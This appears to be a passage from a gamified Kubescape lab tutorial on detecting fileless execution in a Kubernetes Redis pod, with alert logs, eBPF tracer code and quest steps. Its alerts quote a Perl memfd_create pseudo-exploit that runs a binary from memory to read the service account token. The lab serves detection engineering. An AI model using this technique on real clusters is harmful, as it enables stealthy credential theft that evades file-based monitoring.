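	// Values taken from the alerts in this lab.
	fmt.Println(looksFileless("/proc/self/fd/3", "memfd:pwned")) // true
	fmt.Println(looksFileless("/bin/sh", "/usr/bin/dash"))       // false
}
```

Checking the resolved path as well as the exec argument matters because an attacker controls the argument, while the memfd: prefix comes from the kernel.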

Alerts

{"BaseRuntimeMetadata":{"alertName":"Unexpected process launched","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","args":["/usr/bin/perl","-e","\nuse strict; use warnings;\nmy $name = \"pwned\";\nmy $fd = syscall(279, $name, 0);\nif ($fd \u003c 0) { $fd = syscall(319, $name, 0); }\ndie \"memfd_create failed\\n\" if $fd \u003c 0;\nopen(my $src, \"\u003c:raw\", \"/bin/cat\") or die;\nopen(my $dst, \"\u003e\u0026=\", $fd) or die;\nbinmode $ds"],"exec":"/usr/bin/perl","message":"Unexpected process launched: perl with PID 116061"},"infectedPID":116061,"severity":1,"timestamp":"2026-03-01T17:14:23.506032305Z","trace":{},"uniqueID":"452b0edfe862133c04a3660218ac80bb","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"perl","commandLine":"/usr/bin/perl -e \nuse strict; use warnings;\nmy $name = \"pwned\";\nmy $fd = syscall(279, $name, 0);\nif ($fd \u003c 0) { $fd = syscall(319, $name, 0); }\ndie \"memfd_create failed\\n\" if $fd \u003c 0;\nopen(my $src, \"\u003c:raw\", \"/bin/cat\") or die;\nopen(my $dst, \"\u003e\u0026=\", $fd) or die;\nbinmode $ds"},"file":{"name":"perl","directory":"/usr/bin"}}},"CloudMetadata":null,"RuleID":"R0001","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":116061,"cmdline":"/usr/bin/perl -e \nuse strict; use warnings;\nmy $name = \"pwned\";\nmy $fd = syscall(279, $name, 0);\nif ($fd \u003c 0) { $fd = syscall(319, $name, 0); }\ndie \"memfd_create failed\\n\" if $fd \u003c 0;\nopen(my $src, \"\u003c:raw\", \"/bin/cat\") or die;\nopen(my $dst, \"\u003e\u0026=\", $fd) or die;\nbinmode $ds","comm":"perl","ppid":99320,"pcomm":"runc","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/perl"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected process launched: perl with PID 116061","msg":"Unexpected process launched","processtree_depth":"1","time":"2026-03-01T17:14:23Z"}

{"BaseRuntimeMetadata":{"alertName":"Unexpected process launched","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","args":["/proc/self/fd/3","/var/run/secrets/kubernetes.io/serviceaccount/token"],"exec":"/proc/self/fd/3","message":"Unexpected process launched: 3 with PID 116061"},"infectedPID":116061,"severity":1,"timestamp":"2026-03-01T17:14:23.514675324Z","trace":{},"uniqueID":"905a7383968958ff8dd7260602baed47","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"3","commandLine":"/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token"},"file":{"name":"memfd:pwned","directory":"."}}},"CloudMetadata":null,"RuleID":"R0001","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":116061,"cmdline":"/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token","comm":"3","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"memfd:pwned"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected process launched: 3 with PID 116061","msg":"Unexpected process launched","processtree_depth":"1","time":"2026-03-01T17:14:23Z"}

{"BaseRuntimeMetadata":{"alertName":"Fileless execution detected","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","args":["/proc/self/fd/3","/var/run/secrets/kubernetes.io/serviceaccount/token"],"exec":"/proc/self/fd/3","message":"Fileless execution detected: exec call \"3\" is from a malicious source"},"infectedPID":116061,"severity":8,"timestamp":"2026-03-01T17:14:23.514675324Z","trace":{},"uniqueID":"90e172c0dfb727a19e4b8b39e2b89e9d","identifiers":{"process":{"name":"3","commandLine":"/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token"},"file":{"name":"memfd:pwned","directory":"."}}},"CloudMetadata":null,"RuleID":"R1005","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":116061,"cmdline":"/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token","comm":"3","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"memfd:pwned"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Fileless execution detected: exec call \"3\" is from a malicious source","msg":"Fileless execution detected","processtree_depth":"1","time":"2026-03-01T17:14:23Z"}

{"BaseRuntimeMetadata":{"alertName":"Unexpected service account token access","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","flags":["O_RDONLY"],"message":"Unexpected access to service account token: /run/secrets/kubernetes.io/serviceaccount/..2026_03_01_17_06_29.4186941470/token with flags: O_RDONLY","path":"/run/secrets/kubernetes.io/serviceaccount/..2026_03_01_17_06_29.4186941470/token"},"infectedPID":116061,"severity":5,"timestamp":"2026-03-01T17:14:23.515848016Z","trace":{},"uniqueID":"eccbc87e4b5ce2fe28308fd9f2a7baf3","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"3"},"file":{"name":"token","directory":"/run/secrets/kubernetes.io/serviceaccount/..2026_03_01_17_06_29.4186941470"}}},"CloudMetadata":null,"RuleID":"R0006","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":116061,"cmdline":"/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token","comm":"3","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"memfd:pwned"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected access to service account token: /run/secrets/kubernetes.io/serviceaccount/..2026_03_01_17_06_29.4186941470/token with flags: O_RDONLY","msg":"Unexpected service account token access","processtree_depth":"1","time":"2026-03-01T17:14:23Z"}

{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: readlink with PID 99476","syscall":"readlink"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:14:40.332453349Z","trace":{},"uniqueID":"7ae8bea4fa0e4bc42167bb3a680f1686","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: readlink with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:14:40Z"}

{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: fadvise64 with PID 99476","syscall":"fadvise64"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:14:40.342927946Z","trace":{},"uniqueID":"840a89954c4149cca50949888cfdb6a6","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: fadvise64 with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:14:40Z"}

{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: move_pages with PID 99476","syscall":"move_pages"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:14:40.378468605Z","trace":{},"uniqueID":"d5ff80e564058e4b1ce10fecdfb64053","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: move_pages with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:14:40Z"}

{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: memfd_create with PID 99476","syscall":"memfd_create"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:14:40.393691896Z","trace":{},"uniqueID":"63e927ab32c6c56d320a6d818cb4bda3","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: memfd_create with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:14:40Z"}

Step 5: Verify the alert

In another terminal (Terminal 3), let's grep for the specific alert that we'll be tracking throughout the dungeon codebase:

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=50 | grep "R1005"

You should see: "Fileless execution detected: exec call \"3\" is from a malicious source" with severity 8, MITRE tactic TA0005, technique T1055.
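If you would rather check the alert programmatically than by eye, the following is a minimal Go sketch that decodes one log line and reads the rule ID and severity. The field names come from the alert JSON shown above; the `alert` struct and `parseAlert` helper are hypothetical names for illustration, not node-agent types.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// alert mirrors only the fields of the alert JSON used here.
// It is a hypothetical helper type, not part of node-agent.
type alert struct {
	RuleID              string `json:"RuleID"`
	BaseRuntimeMetadata struct {
		AlertName string `json:"alertName"`
		Severity  int    `json:"severity"`
	} `json:"BaseRuntimeMetadata"`
}

// parseAlert decodes one JSON log line into an alert.
func parseAlert(line string) (alert, error) {
	var a alert
	err := json.Unmarshal([]byte(line), &a)
	return a, err
}

func main() {
	// Shortened version of the R1005 line from the logs above.
	line := `{"BaseRuntimeMetadata":{"alertName":"Fileless execution detected","severity":8},"RuleID":"R1005"}`
	a, err := parseAlert(line)
	if err != nil {
		panic(err)
	}
	fmt.Println(a.RuleID, a.BaseRuntimeMetadata.Severity, a.BaseRuntimeMetadata.AlertName)
}
```

Fields that the struct does not declare are simply ignored by the decoder, so the same helper should work on the full-length log lines.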

The gates of the dungeon creak open. Your torch flickers. Nine chambers await. Let us begin the ascent.

Rooms 1-2 -- Kernel Depths & Gadget's Outpost

Room 1: The Kernel Depths

You descend into the deepest chamber. Millions of syscalls echo off the walls. The Kernel processes them all without judgment. A legitimate cat /etc/hosts looks identical to execve("/proc/self/fd/3"). The Kernel does not care.

userspace (Redis container)

┌──────────────────────────────────┐

│ perl: memfd_create("pwned", 0) │ ← syscall 319 (x86_64) / 279 (arm64)

│ write(fd, /bin/cat) │

│ execve("/proc/self/fd/3") │ ← this is the event we trace

└──────────────┬───────────────────┘

─────────────────── kernel boundary ───────────────────

│

┌──────────────▼───────────────────┐

│ Linux kernel: │

│ 1. memfd_create → returns fd=3 │

│ 2. write → copies binary to fd │

│ 3. execve → resolves /proc/ │

│ self/fd/3 → anon inode │

│ 4. Maps into memory, runs it │

│ │

│ Checks: uid/gid permissions ✓ │

│ Does NOT check: intent ✗ │

└──────────────────────────────────┘

Two syscalls matter for our (pseudo)-exploit:

- memfd_create("pwned", 0) --- creates an anonymous RAM-backed file. No filesystem path. Returns fd=3.

- execve("/proc/self/fd/3", ["cat", "...token..."]) --- replaces the process with the binary in that fd. The kernel resolves it through procfs and executes.

The kernel treats execve("/usr/bin/cat") and execve("/proc/self/fd/3") identically. Both pass permission checks. Neither triggers any alert on its own.
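The syscall number for memfd_create depends on the CPU architecture, which is why the diagram lists two values. A small Go sketch of that lookup, assuming only the two numbers quoted in this room (`memfdCreateNR` is a hypothetical helper name):

```go
package main

import (
	"fmt"
	"runtime"
)

// memfdCreateNR returns the memfd_create syscall number for a Go
// architecture name, using the two values quoted in this room.
// ok is false for architectures this sketch does not cover.
func memfdCreateNR(goarch string) (nr int, ok bool) {
	switch goarch {
	case "amd64":
		return 319, true
	case "arm64":
		return 279, true
	}
	return 0, false
}

func main() {
	nr, ok := memfdCreateNR(runtime.GOARCH)
	fmt.Println(runtime.GOARCH, nr, ok)
}
```

A raw number passed to syscall() is only meaningful on the architecture it was looked up for, so a hardcoded value is worth double-checking against the node you are running on.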

Quest: Fire the syscall

Step 1 — create the memfd only (observe the fd number):

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis \

-o jsonpath='{.items[0].metadata.name}')

kubectl -n redis exec "$REDIS_POD" -- perl -e '

my $n = "bob123";

my $fd = syscall(319, $n, 0);

print "memfd fd=$fd\n";

'

You'll see memfd fd=3: the first free fd after stdin (0), stdout (1), stderr (2). Each kubectl exec spawns a fresh process, so fd=3 is always available.

Step 2 — Inspect the logs and find the syscalls:

Check the node-agent logs again (maybe you still have your second terminal open).

kubectl logs -n kubescape -l app=node-agent -c node-agent | grep "memfd_create"

There is quite a lot of noise, as syscalls by themselves are hard to filter. What we want to confirm is that the line my $fd = syscall(319, $n, 0); above really executed the memfd_create syscall, and that the kernel processed it.

You could construct rules directly on the basis of this single syscall. However, this is rather brittle. You'll see below that the approach taken is slightly different: the syscall obviously has to be executed for the pseudo-exploit to work, but the alert rule watches for a more robust tell.

Let's consider the other parts of the fileless exec to understand why.

Room 2: Gadget's Outpost

A green-cloaked ranger waits at the crossroads, eyes closed in concentration. Glowing eBPF threads extend from his fingertips into the kernel. Each thread vibrates when a matching syscall fires.

┌────────────────────────────────────────────────────────────────┐

│ node-agent pod (ns: kubescape) │

│ │

│ ExecTracer.Start() │

│ │ │

│ ▼ │

│ ┌─────────────────────────────────────────────────────────┐ │

│ │ Inspektor Gadget runtime.RunGadget() │ │

│ │ │ │

│ │ eBPF image: trace_exec:v0.48.1 │ │

│ │ Operators: │ │

│ │ 1. kubeManager ── K8s enrichment (pod, ns, labels)│ │

│ │ 2. ociHandler ── OCI image handling │ │

│ │ 3. ExecOperator ── arg buffer parsing (Room 3) │ │

│ │ 4. eventOperator ── our subscription callback │ │

│ └──────────────────────────┬──────────────────────────────┘ │

│ │ every execve in every container │

│ ▼ │

│ DatasourceEvent{ │

│ exepath: "/proc/self/fd/3" │

│ comm: "3" │

│ args: "cat /var/run/.../token" │

│ pid: 51120 │

│ timestamp: <nanoseconds> │

│ } │

│ │ │

│ ▼ │

│ callback() ── filter: retVal > -1 │

│ │ │

│ ▼ │

│ handleEvent() ── enrichEvent() │

│ │ │

│ ▼ │

│ eventCallback (→ OrderedEventQueue) │

└────────────────────────────────────────────────────────────────┘

The ExecTracer loads the trace_exec eBPF gadget into the kernel. From that moment, every execve in every container on the node triggers the probe.

For our fileless exec, we thus focus on the fact that something was executed in a suspicious way, rather than on the syscall. The probe captures:

| Field | Value | How accessed |

|---|---|---|

| exepath | /proc/self/fd/3 or memfd:pwned | GetExePath() |

| comm | 3 (the execved binary name) | GetComm() |

| args | cat /var/run/.../token | GetArgs() |

| proc.pid | 51120 | GetPID() |

| proc.parent.comm | perl | GetPcomm() |

| timestamp_raw | nanosecond boot-time | GetTimestamp() |

Source code -- ExecTracer.Start() loads the eBPF probe

pkg/containerwatcher/v2/tracers/...

func (et *ExecTracer) Start(ctx context.Context) error {

et.gadgetCtx = gadgetcontext.New(ctx,

execImageName,

gadgetcontext.WithDataOperators(

et.kubeManager,

ocihandler.OciHandler,

NewExecOperator(),

et.eventOperator(),

),

...

)

go func() {

params := map[string]string{

"operator.oci.ebpf.paths": "true",

"operator.LocalManager.host": "true",

}

err := et.runtime.RunGadget(et.gadgetCtx, nil, params)

...

}()

return nil

}

If you wanted to use a custom gadget, you would start here: copy the structure and insert your own image. Kubescape has used OCI-based gadgets since November 2025.

Source code -- eventOperator subscribes to the eBPF datasource

pkg/containerwatcher/v2/tracers/exec.go:109-124

func (et *ExecTracer) eventOperator() operators.DataOperator {

return simple.New(string(utils.ExecveEventType),

simple.OnInit(func(gadgetCtx operators.GadgetContext) error {

for _, d := range gadgetCtx.GetDataSources() {

d.Subscribe(func(source datasource.DataSource, data datasource.Data) error {

et.callback(&utils.DatasourceEvent{

Datasource: d,

Data: source.DeepCopy(data),

EventType: utils.ExecveEventType,

})

return nil

}, opPriority)

}

return nil

}),

)

}

This is how the data is normalized from a gadget into the rest of the node-agent.

Quest: Watch the probes load

Loading the gadgets into the kernel is a delicate process. Loading too many at once can cause various errors. If you are ever missing events, it's worth checking whether any of the gadgets failed to load.

kubectl get pods -n kubescape -l app=node-agent -o wide

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=200 |grep -i "tracer\|gadget"

Find, in the source code of node-agent, which gadgets are being loaded and where they are defined.

solution

{"level":"info","ts":"2026-03-21T14:50:26Z","msg":"Starting procfs tracer before other tracers"}

{"level":"info","ts":"2026-03-21T14:50:26Z","msg":"ProcfsTracer started successfully"}

{"level":"info","ts":"2026-03-21T14:50:56Z","msg":"Started tracer","tracer":"trace_exec","count":1}

{"level":"info","ts":"2026-03-21T14:50:58Z","msg":"Started tracer","tracer":"trace_open","count":2}

{"level":"info","ts":"2026-03-21T14:51:00Z","msg":"Started tracer","tracer":"trace_kmod","count":3}

{"level":"info","ts":"2026-03-21T14:51:02Z","msg":"Started tracer","tracer":"trace_randomx","count":4}

{"level":"info","ts":"2026-03-21T14:51:04Z","msg":"Started tracer","tracer":"trace_bpf","count":5}

{"level":"info","ts":"2026-03-21T14:51:06Z","msg":"Started tracer","tracer":"trace_hardlink","count":6}

{"level":"info","ts":"2026-03-21T14:51:08Z","msg":"Started tracer","tracer":"trace_http","count":7}

{"level":"info","ts":"2026-03-21T14:51:10Z","msg":"Started tracer","tracer":"trace_dns","count":8}

{"level":"info","ts":"2026-03-21T14:51:12Z","msg":"Started tracer","tracer":"trace_unshare","count":9}

{"level":"info","ts":"2026-03-21T14:51:14Z","msg":"Started tracer","tracer":"syscall_tracer","count":10}

{"level":"info","ts":"2026-03-21T14:51:16Z","msg":"Started tracer","tracer":"trace_fork","count":11}

{"level":"info","ts":"2026-03-21T14:51:18Z","msg":"Started tracer","tracer":"trace_capabilities","count":12}

{"level":"info","ts":"2026-03-21T14:51:20Z","msg":"Started tracer","tracer":"trace_symlink","count":13}

{"level":"info","ts":"2026-03-21T14:51:22Z","msg":"Started tracer","tracer":"trace_ssh","count":14}

{"level":"info","ts":"2026-03-21T14:51:24Z","msg":"Started tracer","tracer":"trace_ptrace","count":15}

{"level":"info","ts":"2026-03-21T14:51:26Z","msg":"Using iouring gadget image","image":"ghcr.io/inspektor-gadget/gadget/iouring_old:latest","kernelVersion":"6.1.160","major":6,"minor":1}

{"level":"info","ts":"2026-03-21T14:51:26Z","msg":"Started tracer","tracer":"trace_iouring","count":16}

{"level":"info","ts":"2026-03-21T14:51:28Z","msg":"Started tracer","tracer":"trace_exit","count":17}

{"level":"info","ts":"2026-03-21T14:51:30Z","msg":"Started tracer","tracer":"trace_network","count":18}

Inspector Gadget's threads vibrate. An execve("/proc/self/fd/3") has fired in the Redis container. The eBPF probe captures exepath, PID, args, timestamp. The event flows to the Scribes.

Rooms 3-4 -- Scribe's Chamber & Hall of Time

Room 3: The Scribe's Chamber

Tireless scribes receive raw scrolls from Inspector Gadget --- a jumble of null-terminated bytes --- and translate them into structured records the rest of the dungeon can read.

eBPF ring buffer ExecOperator

┌───────────────────────────────────────────┐ ┌────────────────────────────────────────────┐

│ args: "cat\0/var/run/secrets/.../token\0" │ ──────────────> │ args: ["cat", "/var/run/secrets/.../token"] │

│ args_size: 52 │ │ │

│ args_count: 2 │ │ │

└───────────────────────────────────────────┘ └────────────────────────────────────────────┘

raw bytes typed Go struct

The ExecOperator is the scribe for exec events. It reads the raw null-terminated argument buffer from eBPF and splits it into a string slice joined by consts.ArgsSeparator.

For our fileless exec, the raw bytes cat\0/var/run/secrets/kubernetes.io/serviceaccount/token\0 become the args list ["cat", "/var/run/secrets/.../token"].
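The splitting step can be sketched in a few lines of Go. This is a hypothetical stand-in for illustration (`splitArgs` is not the ExecOperator code); it only assumes that the buffer is a sequence of null-terminated strings, as described above.

```go
package main

import (
	"bytes"
	"fmt"
)

// splitArgs turns a null-terminated argument buffer into a slice of strings.
// Hypothetical helper for illustration, not the ExecOperator implementation.
func splitArgs(raw []byte) []string {
	// Drop the final terminator so Split does not yield an empty last element.
	raw = bytes.TrimSuffix(raw, []byte{0})
	if len(raw) == 0 {
		return nil
	}
	parts := bytes.Split(raw, []byte{0})
	args := make([]string, 0, len(parts))
	for _, p := range parts {
		args = append(args, string(p))
	}
	return args
}

func main() {
	raw := []byte("cat\x00/var/run/secrets/kubernetes.io/serviceaccount/token\x00")
	fmt.Printf("%q\n", splitArgs(raw))
}
```

Splitting on the null byte rather than on whitespace matters: an argument that itself contains spaces stays one element.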

The other key field --- exepath --- comes directly from the eBPF probe. No parsing needed.

Source code -- GetExePath() reads exepath from eBPF datasource

pkg/utils/datasource_event.go

func (e *DatasourceEvent) GetExePath() string {

switch e.EventType {

case ExecveEventType, ...:

exepath, _ := e.getFieldAccessor("exepath").String(e.Data)

return exepath

}

}

This is the value that R1005 will check against event.exepath.contains('memfd').
